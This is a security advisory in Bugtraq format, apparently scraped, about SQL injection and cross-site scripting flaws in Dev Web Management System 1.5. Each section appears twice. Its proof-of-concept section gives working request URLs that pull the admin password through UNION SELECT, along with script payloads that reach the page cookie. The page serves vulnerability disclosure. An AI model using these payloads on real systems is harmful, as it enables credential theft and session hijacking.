Dev Web Management System Multiple Input Validation Vulnerabilities
BID:16063
Info
Dev Web Management System Multiple Input Validation Vulnerabilities
| Bugtraq ID: | 16063 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Dec 27 2005 12:00AM |
| Updated: | Dec 27 2005 12:00AM |
| Credit: | Discovered by <[email protected]>. |
| Vulnerable: |
Dev Dev Web Management System 1.5 |
| Not Vulnerable: | |
Discussion
Dev Web Management System Multiple Input Validation Vulnerabilities
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
Dev Web Management System versions 1.5 and earlier are prone to these issues.
Dev Web Management System is prone to multiple input validation vulnerabilities. These issues may allow SQL injection and cross-site scripting attacks.
Dev Web Management System versions 1.5 and earlier are prone to these issues.
Exploit / POC
Dev Web Management System Multiple Input Validation Vulnerabilities
An exploit is not required.
The following examples were provided:
http://example.com/[path]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,10
9,105,110,95,112,97,115,115,119,111,114,100)
http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
http://example.com/[path]/download_now.php?target=9999999999999[SQL]
http://example.com/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>
http://example.com/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>
http://example.com/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>
http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>
An exploit is not required.
The following examples were provided:
http://example.com/[path]/index.php?session=0&action=openforum&cat=-1%20UNION%20SELECT%20value,value,value%20FROM%20variables1%20WHERE%20name=CHAR(97,100,10
9,105,110,95,112,97,115,115,119,111,114,100)
http://example.com/[path]/getfile.php?cat=%%'UNION%20SELECT%20value,value%20FROM%20variables1%20%20WHERE%20name='admin_password'/*
http://example.com/[path]/download_now.php?target=9999999999999[SQL]
http://example.com/[path]/add.php?language[ENTER_ARTICLE_TITLE]=");}}--></script><script>alert(document.cookie)</script>
http://example.com/[path]/add.php?language[SPECIFY_ZONE]=");}}--></script><script>alert(document.cookie)</script>
http://example.com/[path]/add.php?language[ENTER_ARTICLE_HEADER]=");}}--></script><script>alert(document.cookie)</script>
http://example.com/[path]/add.php?language[ENTER_ARTICLE_BODY]=");}}--></script><script>alert(document.cookie)</script>
Solution / Fix
Dev Web Management System Multiple Input Validation Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Dev Web Management System Multiple Input Validation Vulnerabilities
References:
References: